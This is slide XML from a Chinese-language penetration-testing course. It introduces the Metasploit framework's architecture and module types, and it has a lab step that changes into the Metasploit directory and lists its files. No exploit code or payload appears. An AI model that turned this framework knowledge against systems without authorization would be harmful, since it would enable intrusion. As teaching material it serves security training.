          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4327525" y="1205865"/>
            <a:ext cx="6831330" cy="5048250"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="112" name="文本框 111"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5147945" y="6150928"/>
            <a:ext cx="5080000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0" algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>图2-4-1  Metasploit框架结构</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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组合 6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="479781" y="2216574"/>
            <a:ext cx="4062095" cy="638810"/>
            <a:chOff x="6627851" y="3377688"/>
            <a:chExt cx="4062095" cy="639173"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="矩形: 圆角 27"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6627851" y="3493208"/>
              <a:ext cx="457200" cy="457200"/>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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形 8" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293331" y="3709982"/>
              <a:ext cx="3396615" cy="306879"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>了解 Metasploit框架结构</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="文本框 573"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="3377688"/>
              <a:ext cx="868680" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>步骤一</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="文本框 574"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6667040" y="3537851"/>
              <a:ext cx="450850" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>01</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【项目实施】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="矩形 15"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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17" name="矩形 16"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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19" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="5081905" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.4.1 认识Metasploit</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3768090" y="788670"/>
            <a:ext cx="8413750" cy="5908040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="304800"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Metasploit基础库文件由UI(用户界面接口)、Base（拓展Core)、Core(实现与各种类型的上层模块和插件进行交互）和 Rex（基本库〉这四个部分组成，提供核心框架和一些基础功能的支持。UI由Driver（驱动程序)、Console（控制台)、CLI （命令行界面)、WebUI (Web用户界面)、GUI（图形用户界面)、Armltage（图形界面的Metasploit）组成。Base 由 Config（系统配置)、Loging (日志记录)、Serializer〈把并行数据变成串行数据的寄存器)、Simple、Sessions(会话）组成，其中还集成了Penetration Modules（安全测试模块)、Framework Plugins（框架插件)。Core 由 Datastore（数据存储)、Event Dispatcher(事件调度器)、Module Manager（模块管理器)、Plugin Manager(插件管理器)、Session Manager(会话管理器)、Framework(框架）组成。Rex包括基础组件网络套接字、网络应用协议客户端与服务端实现、日志子系统、安全测试例程和数据库支持。Penetration Modules 由 Exploits(安全测试模块)、Payloads(有效载荷模块)、Nops(空指令模块)、Encoders(（编码器模块)、Auxiliary（辅助模块)、Post（后渗透模块）组成。Framework Plugins有nmap、nusses等。Exploits(安全测试模块）定义为使用Payloads的模块，没有使用Payloads的安全测试模块为辅助模块。Payloads、Encoders和Nops之间的关系是：Encoders确保Payloads到达目的地;Nops保持和Payloads的大小一致；Payloads由远程运行的代码组成。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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组合 6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="479781" y="2216574"/>
            <a:ext cx="4062095" cy="638810"/>
            <a:chOff x="6627851" y="3377688"/>
            <a:chExt cx="4062095" cy="639173"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="矩形: 圆角 27"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6627851" y="3493208"/>
              <a:ext cx="457200" cy="457200"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="7030A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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形 8" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293331" y="3709982"/>
              <a:ext cx="3396615" cy="306879"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>了解 Metasploit文件结构</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="文本框 573"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="3377688"/>
              <a:ext cx="868680" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>步骤二</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="文本框 574"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6667040" y="3537851"/>
              <a:ext cx="450850" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>02</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【项目实施】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="矩形 50"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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52" name="矩形 51"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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53" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="5081905" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.4.1 认识Metasploit</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="112" name="文本框 111"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5604510" y="379095"/>
            <a:ext cx="5826125" cy="922020"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="304800"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>1.进入操作机，使用“cd /usr/share/metasploit-framework”进入Metasploit工具所在目录，使用“ls”命令查看目录文件情况，如图2-4-2所示。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
